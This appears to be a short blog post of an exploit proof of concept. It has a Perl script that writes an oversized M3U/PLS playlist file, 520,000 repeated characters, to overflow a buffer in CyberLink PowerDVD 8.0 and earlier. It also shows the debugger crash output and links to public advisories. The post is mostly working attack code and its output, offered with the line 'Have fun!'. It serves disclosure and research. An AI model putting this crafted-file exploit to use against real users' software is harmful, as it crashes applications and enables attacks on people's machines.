PoC:
--------------------------
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
$buffer = "J" x 520000; open(m3u, ">./evil_list.m3u"); # or .pls
print m3u "$buffer";
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008
---------------------------------------------------------------------------------------------------------------------
(ea0.d4c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003e84 ebx=02890048 ecx=00032310 edx=02890049 esi=0007ef41 edi=0012cb2c
eip=0043fb37 esp=0012c308 ebp=0012cf4c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
image00400000+0x3fb37:
0043fb37 8501 test dword ptr [ecx],eax ds:0023:00032310=00000000
-------------------------------------------------------------------------------------------
http://zeroscience.org/codes/powerdvd_bof.txt
http://www.securityfocus.com/bid/30341/
http://www.packetstormsecurity.org/filedesc/powerdvd_bof.pl.txt.html
http://www.juniper.net/security/auto/vulnerabilities/vuln30341.html
http://www.venustech.com.cn/NewsInfo/124/1959.Html
http://www.maestro-sec.com/forum/viewtopic.php?t=588&f=19
http://www.hwupgrade.it/forum/showthread.php?p=23436246
No comments:
Post a Comment